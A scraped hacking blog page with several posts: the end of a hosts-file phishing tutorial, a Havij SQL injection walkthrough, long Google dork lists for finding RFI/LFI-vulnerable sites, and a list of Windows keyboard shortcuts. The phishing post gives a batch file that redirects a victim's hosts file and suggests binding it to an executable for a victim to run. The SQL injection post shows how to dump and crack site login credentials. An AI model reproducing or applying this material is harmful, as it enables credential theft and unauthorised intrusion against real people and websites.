href="http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSXQ8tlVMUI/AAAAAAAAAFc/N4QjVlkeUSM/s1600/3.jpg" 
imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="378" src="http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSXQ8tlVMUI/AAAAAAAAAFc/N4QjVlkeUSM/s400/3.jpg" width="400" /></a></div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: justify;"><a href="http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSXQ_Tb1EvI/AAAAAAAAAFg/l7kv_Ff-4HA/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSXQ_Tb1EvI/AAAAAAAAAFg/l7kv_Ff-4HA/s400/4.jpg" width="301" /></a></div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: justify;"><a href="http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSXRBlnXT_I/AAAAAAAAAFk/RLiKHQA9KKc/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSXRBlnXT_I/AAAAAAAAAFk/RLiKHQA9KKc/s400/5.jpg" width="303" /></a></div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: justify;"><a href="http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSXRFkeG5TI/AAAAAAAAAFo/GaLS3CrWyfo/s1600/6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSXRFkeG5TI/AAAAAAAAAFo/GaLS3CrWyfo/s400/6.jpg" width="301" /></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><div style="text-align: left;">Then you can bind this file with any exe ( using a binder or directly give it to victim. 
He is supposed to click it and you are done .</div></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Method 2 - Create a batch file which would modify hosts file as per your need.</b></div><div style="text-align: justify;">Open your notepad and type the following text</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span class="Apple-style-span" style="background-color: #f3f3f3;">echo xxx.xxx.xxx.xxx. www.watever.com >> C:\windows\system32\drivers\etc\hosts</span></div><div style="text-align: justify;"><span class="Apple-style-span" style="background-color: #f3f3f3;">echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts </span></div><div style="text-align: justify;"><i style="background-color: white;"><span class="Apple-style-span" style="font-size: xx-small;">Obviously replace it with your IP and website acc. to yourself.</span></i></div><div class="separator" style="clear: both; text-align: justify;"><a href="http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSXQxJfKByI/AAAAAAAAAFQ/BvMjhzYpiwY/s1600/dphish.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="99" src="http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSXQxJfKByI/AAAAAAAAAFQ/BvMjhzYpiwY/s640/dphish.jpg" width="640" /></a></div><div style="text-align: justify;"><i style="background-color: white;"><span class="Apple-style-span" style="font-size: xx-small;"><br /></span></i></div><div style="text-align: justify;"><b>Save file as 'all files' instead of txt files and name it anything.bat . 
The extension must be .bat. </b></div><div style="text-align: justify;">When the victim runs this file, a new entry is made in the hosts file.</div><div style="text-align: justify;"><br /></div><div style="text-align: left;"><div style="text-align: justify;"><i>You can test both of the above methods by modifying your own hosts file.</i></div></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><div style="text-align: left;"><b>Limitations of the attack:</b></div></div><div style="text-align: justify;"><div style="text-align: left;"><b>1</b>. Our public IP address is most probably dynamic, so it changes every time we disconnect and reconnect. To overcome this we need to purchase a static IP from our ISP.</div></div><div style="text-align: justify;"><div style="text-align: left;"><b>2.</b> The browser may warn the victim that the digital certificate of the website is not genuine.</div></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Countermeasures:</b></div><div style="text-align: justify;">Never blindly enter your credentials in a login page, even if you have typed the domain name into the web browser yourself. Check whether the protocol is "http" or "https". 
https is secure.</div></div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-92190920467835609522011-03-05T20:46:00.000-08:002011-06-27T20:13:52.749-07:00SQL Injection in Easy steps......!!!!!!<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"><span class="smalltext" style="font-size: 11px;"><strong><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;">[SQL] HACK SITES USING Havij v1.14</span></span></strong></span></span><br /><div class="post_body" id="pid_2956" style="font-family: Verdana, Arial, sans-serif; font-size: 13px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;"><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;">it is simple tut how to use havij to hack sites <img alt="Smile" border="0" src="http://hackcommunity.com/images/smilies/smile.gif" style="border-bottom-style: none; border-color: initial; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; border-width: initial; padding-right: 0px; vertical-align: middle;" title="Smile" /><br /><br /></span></span><a href="http://adf.ly/55846/http://lnk.co/GP51J" style="text-decoration: none;" target="_blank"><span class="Apple-style-span" style="color: #3d85c6;"><span class="Apple-style-span" style="background-color: white;">Download Havij v1.14 </span></span></a><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="color: 
#3d85c6;"><span class="Apple-style-span" style="background-color: white;"><br /></span></span> <br /><br />1. First, find a site vulnerable to SQL injection.<br /><br />2. Open Havij and paste the vulnerable link, as shown in the figure.<br /><br />3. It then shows some messages. Watch them and be patient for some time while it finds whether the site is vulnerable, the type of injection, and whether the DB server is MySQL; it will also find the database name. After that you get the database name, which looks like xxxx_xxxx.<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibTyGBO1ct_FlWT_T7BIyWapbNsVhSSZCly_U8yKam8-Ri4BZaWtOLpCWwuxKp2dQ4d3ZW-SG7F-vmKnJT3b2F9IE0GLBndKD4z8KsHuDmIsfWIl9oP0UFufUgRbd61ra2KtVQAjYOmgs/s1600/1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibTyGBO1ct_FlWT_T7BIyWapbNsVhSSZCly_U8yKam8-Ri4BZaWtOLpCWwuxKp2dQ4d3ZW-SG7F-vmKnJT3b2F9IE0GLBndKD4z8KsHuDmIsfWIl9oP0UFufUgRbd61ra2KtVQAjYOmgs/s1600/1.jpeg" /></a><br /><br />4. Then move on to finding the tables by clicking "tables", as shown in the figure. Now click "Get tables" and wait some time if needed.<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqAAkc_pPqLrB_yCncUekFb6o1z25mGjFqdoxsjJ4Xh67vuBnst6nv_Kwk0zIcBcsRqT5sZ9x1K2UELzqq5aabUgsGxQAXxp2v97KDqOIJzHrgvIC59068eJ0H03Eaw8lCHEAwvGj0zY4/s1600/2.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqAAkc_pPqLrB_yCncUekFb6o1z25mGjFqdoxsjJ4Xh67vuBnst6nv_Kwk0zIcBcsRqT5sZ9x1K2UELzqq5aabUgsGxQAXxp2v97KDqOIJzHrgvIC59068eJ0H03Eaw8lCHEAwvGj0zY4/s1600/2.jpeg" style="cursor: move;" /></a><br /><br />5. 
After the tables have been found, you will see a "users" table. Tick it and click the "Get columns" tab, as shown in the figure.<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-ixBaLikugrNDxNDoNBJ7IojZID-uCUVL1FRJuAeUQX9mnXB1ikr-3zZztuWn4Klf8fRp7FEVaTSoKxpibQ8Pepa20TEqNANaKgqsYTrYyoi7gxXf7Hsi2xYYc3WwXOQhQbGuYcf8Xec/s1600/3.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-ixBaLikugrNDxNDoNBJ7IojZID-uCUVL1FRJuAeUQX9mnXB1ikr-3zZztuWn4Klf8fRp7FEVaTSoKxpibQ8Pepa20TEqNANaKgqsYTrYyoi7gxXf7Hsi2xYYc3WwXOQhQbGuYcf8Xec/s1600/3.jpeg" style="cursor: move;" /></a><br /><br /><br />6. There, just tick username and password and click "Get data".<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgasXQU1yyVblWq3s-lBY7iVsdBSee6eZAWBnWAyfFi2WkZpnhesRHDQoQjr53hrhzuGGgBHZTLVpd1T4dJJxkaJXDx_TwVPBHXsiOrKRyP6kN479gWh4-lr4viOGYrQCLluMTFE-Ng2RM/s1600/4.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgasXQU1yyVblWq3s-lBY7iVsdBSee6eZAWBnWAyfFi2WkZpnhesRHDQoQjr53hrhzuGGgBHZTLVpd1T4dJJxkaJXDx_TwVPBHXsiOrKRyP6kN479gWh4-lr4viOGYrQCLluMTFE-Ng2RM/s1600/4.jpeg" style="cursor: move;" /></a><br /><br /><br />8. 
Bingo! You now have the ID and password, which may be the admin's.<br />The password is retrieved as an MD5 hash; you can also crack it using this tool, as shown in the figure.<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0pwAt_jrzlp5Chdyrf5xeGOYoVAAQ-nYi-0o3YXA2YY2I-B8PIbwAIqlTGIK_h-qyfGn1rPWqYkt-AOM0WMupBEn98TEw3U5X3RlBenfihd7SNbp5bFTiApRyYHktWSTQRZekE28rcyI/s1600/5.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0pwAt_jrzlp5Chdyrf5xeGOYoVAAQ-nYi-0o3YXA2YY2I-B8PIbwAIqlTGIK_h-qyfGn1rPWqYkt-AOM0WMupBEn98TEw3U5X3RlBenfihd7SNbp5bFTiApRyYHktWSTQRZekE28rcyI/s1600/5.jpeg" /></a><br /><br /></span></span><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;">*************************************************************************</span></span><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;"><br /></span></span><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;">HOW TO FIND SQL VULNERABLE SITES</span></span><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;"><br /></span></span><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;">GO HERE </span></span><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;"><br /></span></span><br /><blockquote style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; 
border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"><cite style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; display: block; font-style: normal; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;">Quote:</span></span></cite><a href="http://adf.ly/55846/http://lnk.co/GP51L" style="text-decoration: none;" target="_blank"><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;">http://lnk.co/GP51L</span></span></a></blockquote><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;"><br />The green colour means there is an SQL injection vulnerability,<br /><br />like this in the picture:</span></span><br /><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;"><br /></span></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRHjcyiIUZi5cqF28MrysUhqE7YU75S7FWpkeDSOzxJQ9N4GITAtLZS5TUdnJp2lG3bWyWxcZtOSSWH7a4B3Sq-TDRgEf1HdV4ddu2Rvz9-kblqrU2tHLKJGFFZyoxqfh0zccmc9qC4dA/s1600/6.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRHjcyiIUZi5cqF28MrysUhqE7YU75S7FWpkeDSOzxJQ9N4GITAtLZS5TUdnJp2lG3bWyWxcZtOSSWH7a4B3Sq-TDRgEf1HdV4ddu2Rvz9-kblqrU2tHLKJGFFZyoxqfh0zccmc9qC4dA/s1600/6.jpeg" /></a></div><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: 
black;"><br /><br />SQL Dorks<br /></span></span><br /><div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #86898b; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"><div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;">Code:</span></span></div><div class="body" dir="ltr"><code style="display: block; font-family: Monaco, Consolas, Courier, monospace; font-size: 13px; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;">Here are a few dorks for finding vulnerable websites:<br /></span></span></code><br /><div><br /></div></div></div></div></div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com3tag:blogger.com,1999:blog-289744729559414161.post-60917003649723617602011-02-25T09:37:00.000-08:002011-06-27T20:13:52.749-07:00Advance Dorks For LFI & RFI<div dir="ltr" style="text-align: left;" trbidi="on"><div style="color: red;"><b>Remote File Inclusion/Local File Inclusion:</b></div><div style="margin: 
5px 20px 20px;"> <pre class="alt2" dir="ltr" style="border: 1px inset; height: 258px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;">inurl:/_functions.php?prefix=<br /><br />inurl:/cpcommerce/_functions.php?prefix=<br /><br />inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=<br /><br />inurl:/modules/agendax/addevent.inc.php?agendax_path=<br /><br />inurl:/ashnews.php?pathtoashnews=<br /><br />inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=<br /><br />inurl:/pm/lib.inc.php?pm_path=<br /><br />inurl:/b2-tools/gm-2-b2.php?b2inc=<br /><br />inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=<br /><br />inurl:/modules/agendax/addevent.inc.php?agendax_path=<br /><br />inurl:/includes/include_once.php?include_file=<br /><br />inurl:/e107/e107_handlers/secure_img_render.php?p=<br /><br />inurl:/shoutbox/expanded.php?conf=<br /><br />inurl:/main.php?x=<br /><br />inurl:/myPHPCalendar/admin.php?cal_dir=<br /><br />inurl:/index.php/main.php?x=<br /><br />inurl:/index.php?include=<br /><br />inurl:/index.php?x=<br /><br />inurl:/index.php?open=<br /><br />inurl:/index.php?visualizar=<br /><br />inurl:/template.php?pagina=<br /><br />inurl:/index.php?pagina=<br /><br />inurl:/index.php?inc=<br /><br />inurl:/includes/include_onde.php?include_file=<br /><br />inurl:/index.php?page=<br /><br />inurl:/index.php?pg=<br /><br />inurl:/index.php?show=<br /><br />inurl:/index.php?cat=<br /><br />inurl:/index.php?file=<br /><br />inurl:/db.php?path_local=<br /><br />inurl:/index.php?site=<br /><br />inurl:/htmltonuke.php?filnavn=<br /><br />inurl:/livehelp/inc/pipe.php?HCL_path=<br /><br />inurl:/hcl/inc/pipe.php?HCL_path=<br /><br />inurl:/inc/pipe.php?HCL_path=<br /><br />inurl:/support/faq/inc/pipe.php?HCL_path=<br /><br />inurl:/help/faq/inc/pipe.php?HCL_path=<br /><br />inurl:/helpcenter/inc/pipe.php?HCL_path=<br /><br />inurl:/live-support/inc/pipe.php?HCL_path=<br /><br />inurl:/gnu3/index.php?doc=<br /><br 
/>inurl:/gnu/index.php?doc=<br /><br />inurl:/phpgwapi/setup/tables_update.inc.php?appdir=<br /><br />inurl:/forum/install.php?phpbb_root_dir=<br /><br />inurl:/includes/calendar.php?phpc_root_path=<br /><br />inurl:/includes/setup.php?phpc_root_path=<br /><br />inurl:/inc/authform.inc.php?path_pre=<br /><br />inurl:/include/authform.inc.php?path_pre=<br /><br />inurl:index.php?nic=<br /><br />inurl:index.php?sec=<br /><br />inurl:index.php?content=<br /><br />inurl:index.php?link=<br /><br />inurl:index.php?filename=<br /><br />inurl:index.php?dir=<br /><br />inurl:index.php?document=<br /><br />inurl:index.php?view=<br /><br />inurl:*.php?sel=<br /><br />inurl:*.php?session=&content=<br /><br />inurl:*.php?locate=<br /><br />inurl:*.php?place=<br /><br />inurl:*.php?layout=<br /><br />inurl:*.php?go=<br /><br />inurl:*.php?catch=<br /><br />inurl:*.php?mode=<br /><br />inurl:*.php?name=<br /><br />inurl:*.php?loc=<br /><br />inurl:*.php?f=<br /><br />inurl:*.php?inf=<br /><br />inurl:*.php?pg=<br /><br />inurl:*.php?load=<br /><br />inurl:*.php?naam=<br /><br />allinurl:/index.php?page= site:*.ru<br /><br />allinurl:/index.php?file= site:*.ru</pre></div><br /><b><span style="color: red;">All INURL</span></b> :<br /><br /><br /><pre class="alt2" dir="ltr" style="border: 1px inset; height: 258px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;">/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=<br /><br />/includes/header.php?systempath=<br /><br />/Gallery/displayCategory.php?basepath=<br /><br />/index.inc.php?PATH_Includes=<br /><br />/ashnews.php?pathtoashnews=<br /><br />/ashheadlines.php?pathtoashnews=<br /><br />/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=<br /><br />/demo/includes/init.php?user_inc=<br /><br />/jaf/index.php?show=<br /><br />/inc/shows.inc.php?cutepath=<br /><br />/poll/admin/common.inc.php?base_path=<br /><br />/pollvote/pollvote.php?pollname=<br /><br />/sources/post.php?fil_config=<br /><br 
/>/modules/My_eGallery/public/displayCategory.php?basepath=<br /><br />/bb_lib/checkdb.inc.php?libpach=<br /><br />/include/livre_include.php?no_connect=lol&chem_absolu=<br /><br />/index.php?from_market=Y&pageurl=<br /><br />/modules/mod_mainmenu.php?mosConfig_absolute_path=<br /><br />/pivot/modules/module_db.php?pivot_path=<br /><br />/modules/4nAlbum/public/displayCategory.php?basepath=<br /><br />/derniers_commentaires.php?rep=<br /><br />/modules/coppermine/themes/default/theme.php?THEME_DIR=<br /><br />/modules/coppermine/include/init.inc.php?CPG_M_DIR=<br /><br />/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=<br /><br />/coppermine/themes/maze/theme.php?THEME_DIR=<br /><br />/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=<br /><br />/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=<br /><br />/myPHPCalendar/admin.php?cal_dir=<br /><br />/agendax/addevent.inc.php?agendax_path=<br /><br />/modules/mod_mainmenu.php?mosConfig_absolute_path=<br /><br />/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=<br /><br />/main.php?page=<br /><br />/default.php?page=<br /><br />/index.php?action=<br /><br />/index1.php?p=<br /><br />/index2.php?x=<br /><br />/index2.php?content=<br /><br />/index.php?conteudo=<br /><br />/index.php?cat=<br /><br />/include/new-visitor.inc.php?lvc_include_dir=<br /><br />/modules/agendax/addevent.inc.php?agendax_path=<br /><br />/shoutbox/expanded.php?conf=<br /><br />/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=<br /><br />/pivot/modules/module_db.php?pivot_path=<br /><br />/library/editor/editor.php?root=<br /><br />/library/lib.php?root=<br /><br />/e107/e107_handlers/secure_img_render.php?p=<br /><br />/zentrack/index.php?configFile=<br /><br />/main.php?x=<br /><br />/becommunity/community/index.php?pageurl=<br /><br />/GradeMap/index.php?page=<br /><br />/index4.php?body=<br /><br />/side/index.php?side=<br /><br />/main.php?page=<br /><br />/es/index.php?action=<br /><br 
/>/index.php?sec=<br /><br />/index.php?main=<br /><br />/index.php?sec=<br /><br />/index.php?menu=<br /><br />/html/page.php?page=<br /><br />/page.php?view=<br /><br />/index.php?menu=<br /><br />/main.php?view=<br /><br />/index.php?page=<br /><br />/content.php?page=<br /><br />/main.php?page=<br /><br />/index.php?x=<br /><br />/main_site.php?page=<br /><br />/index.php?L2=<br /><br />/content.php?page=<br /><br />/main.php?page=<br /><br />/index.php?x=<br /><br />/main_site.php?page=<br /><br />/index.php?L2=<br /><br />/index.php?show=<br /><br />/tutorials/print.php?page=<br /><br />/index.php?page=<br /><br />/index.php?level=<br /><br />/index.php?file=<br /><br />/index.php?inter_url=<br /><br />/index.php?page=<br /><br />/index2.php?menu=<br /><br />/index.php?level=<br /><br />/index1.php?main=<br /><br />/index1.php?nav=<br /><br />/index1.php?link=<br /><br />/index2.php?page=<br /><br />/index.php?myContent=<br /><br />/index.php?TWC=<br /><br />/index.php?sec=<br /><br />/index1.php?main=<br /><br />/index2.php?page=<br /><br />/index.php?babInstallPath=<br /><br />/main.php?body=<br /><br />/index.php?z=<br /><br />/main.php?view=<br /><br />/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=<br /><br />/index.php?file=<br /><br />/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=</pre><br /><span style="color: red; font-size: large;"><b>LFI :</b></span> <br /><pre class="alt2" dir="ltr" style="border: 1px inset; height: 258px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;">acion=<br />act=<br />action=<br />API_HOME_DIR=<br />board=<br />cat=<br />client_id=<br />cmd=<br />cont=<br />current_frame=<br />date=<br />detail=<br />dir=<br />display=<br />download=<br />f=<br />file=<br />fileinclude=<br />filename=<br />firm_id=<br />g=<br />getdata=<br />go=<br />HT=<br />idd=<br />inc=<br />incfile=<br />incl=<br />include_file=<br />include_path=<br />infile=<br />info=<br />ir=<br />lang=<br 
/>language=<br />link=<br />load=<br />main=<br />mainspot=<br />msg=<br />num=<br />openfile=<br />p=<br />page=<br />pagina=<br />path=<br />path_to_calendar=<br />pg=<br />plik<br />qry_str=<br />ruta=<br />safehtml=<br />section=<br />showfile=<br />side=<br />site_id=<br />skin=<br />static=<br />str=<br />strona=<br />sub=<br />tresc=<br />url=<br />user=</pre></div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-60824489598549839632011-02-25T07:05:00.000-08:002011-06-27T20:13:52.749-07:00All keyboard Shortcuts<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="border-collapse: separate; color: black; font-family: 'Times New Roman'; font-size: small; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span class="Apple-style-span" style="color: #333333; font-family: Verdana,sans-serif; font-size: 13px; line-height: 19px; text-align: left;"><strong><span style="font-family: arial;">1.) Windows Hotkeys<br />Shift + F10 right-clicks.<br />Win + L (XP Only): Locks keyboard. Similar to Lock Workstation.<br />Win + F or F3: Open Find dialog. (All Files) F3 may not work in some applications which use F3 for their own find dialogs.<br />Win + Control + F: Open Find dialog. (Computers)<br />Win + U: Open Utility Manager.<br />Win + F1: Open Windows help.<br />Win + Pause: Open System Properties dialog.<br />Win + Tab: Cycle through taskbar buttons. Enter clicks, AppsKey or Shift + F10 right-clicks.<br />Win + Shift + Tab: Cycle through taskbar buttons in reverse.<br />Alt + Tab: Display CoolSwitch. 
More commonly known as the AltTab dialog.<br />Alt + Shift + Tab: Display CoolSwitch; go in reverse.<br />Alt + Escape: Send active window to the bottom of the z-order.<br />Alt + Shift + Escape: Activate the window at the bottom of the z-order.<br />Alt + F4: Close active window; or, if all windows are closed, open shutdown dialog.<br />Shift while a CD is loading: Bypass AutoPlay.<br />Shift while logging in: Bypass startup folder. Only applications in the startup folder are skipped, not those started from the registry (Microsoft\Windows\CurrentVersion\Run\).<br />Ctrl + Alt + Delete or Ctrl + Alt + NumpadDel (Both NumLock states): Invoke the Task Manager or NT Security dialog.<br />Ctrl + Shift + Escape (2000/XP) or Ctrl + Alt + NumpadDot: Invoke the Task Manager. On earlier OSes, acts like Ctrl + Escape.<br />Printscreen: Copy screenshot of current screen to clipboard.<br />Alt + Printscreen: Copy screenshot of current active window to clipboard.<br />Ctrl + Alt + Down Arrow: Invert screen. Untested on OSes other than XP.<br />Ctrl + Alt + Up Arrow: Undo inversion.<br />Win + B: Move focus to systray icons.<br /><br />2.) Generic<br />Ctrl + C or Ctrl + Insert: Copy.<br />Ctrl + X or Shift + Delete: Cut.<br />Ctrl + V or Shift + Insert: Paste/Move.<br />Ctrl + N: New... File, Tab, Entry, etc.<br />Ctrl + S: Save.<br />Ctrl + O: Open...<br />Ctrl + P: Print.<br />Ctrl + Z: Undo.<br />Ctrl + A: Select all.<br />Ctrl + F: Find...<br />Ctrl + W: Close the current window.<br />Ctrl + F4: Close tab or child window.<br />F1: Open help.<br />F11: Toggle full screen mode.<br />Alt or F10: Activate menu bar.<br />Alt + Space: Display system menu. Same as clicking the icon on the titlebar.<br />Escape: Remove focus from current control/menu, or close dialog box.<br /><br />3.) 
Generic Navigation<br />Tab: Forward one item.<br />Shift + Tab: Backward one item.<br />Ctrl + Tab: Cycle through tabs/child windows.<br />Ctrl + Shift + Tab: Cycle backwards through tabs/child windows.<br />Enter: If a button's selected, click it, otherwise, click default button.<br />Space: Toggle items such as radio buttons or checkboxes.<br />Alt + (Letter): Activate item corresponding to (Letter). (Letter) is the underlined letter on the item's name.<br />Ctrl + Left: Move cursor to the beginning of previous word.<br />Ctrl + Right: Move cursor to the beginning of next word.<br />Ctrl + Up: Move cursor to beginning of previous paragraph. This and all subsequent Up/Down hotkeys in this section have only been known to work in RichEdit controls.<br />Ctrl + Down: Move cursor to beginning of next paragraph.<br />Shift + Left: Highlight one character to the left.<br />Shift + Right: Highlight one character to the right.<br />Shift + Up: Highlight from current cursor position, to one line up.<br />Shift + Down: Highlight from current cursor position, to one line down.<br />Ctrl + Shift + Left: Highlight to beginning of previous word.<br />Ctrl + Shift + Right: Highlight to beginning of next word.<br />Ctrl + Shift + Up: Highlight to beginning of previous paragraph.<br />Ctrl + Shift + Down: Highlight to beginning of next paragraph.<br />Home: Move cursor to top of a scrollable control.<br />End: Move cursor to bottom of a scrollable control.<br /><br />4.) Generic File Browser<br />Arrow Keys: Navigate.<br />Shift + Arrow Keys: Select multiple items.<br />Ctrl + Arrow Keys: Change focus without changing selection. "Focus" is the object that will run on Enter. 
Space toggles selection of the focused item.<br />(Letter): Select first found item that begins with (Letter).<br />BackSpace: Go up one level to the parent directory.<br />Alt + Left: Go back one folder.<br />Alt + Right: Go forward one folder.<br />Enter: Activate (Double-click) selected item(s).<br />Alt + Enter: View properties for selected item.<br />F2: Rename selected item(s).<br />Ctrl + NumpadPlus: In a Details view, resizes all columns to fit the longest item in each one.<br />Delete: Delete selected item(s).<br />Shift + Delete: Delete selected item(s); bypass Recycle Bin.<br />Ctrl while dragging item(s): Copy.<br />Ctrl + Shift while dragging item(s): Create shortcut(s).<br />In tree pane, if any:<br />Left: Collapse the current selection if expanded, or select the parent folder.<br />Right: Expand the current selection if collapsed, or select the first subfolder.<br />NumpadAsterisk: Expand currently selected directory and all subdirectories. No undo.<br />NumpadPlus: Expand currently selected directory.<br />NumpadMinus: Collapse currently selected directory.<br /><br />5.) Accessibility<br />Right Shift for eight seconds: Toggle FilterKeys on and off. FilterKeys must be enabled.<br />Left Alt + Left Shift + PrintScreen: Toggle High Contrast on and off. High Contrast must be enabled.<br />Left Alt + Left Shift + NumLock: Toggle MouseKeys on and off. MouseKeys must be enabled.<br />NumLock for five seconds: Toggle ToggleKeys on and off. ToggleKeys must be enabled.<br />Shift five times: Toggle StickyKeys on and off. StickyKeys must be enabled.<br />6.) 
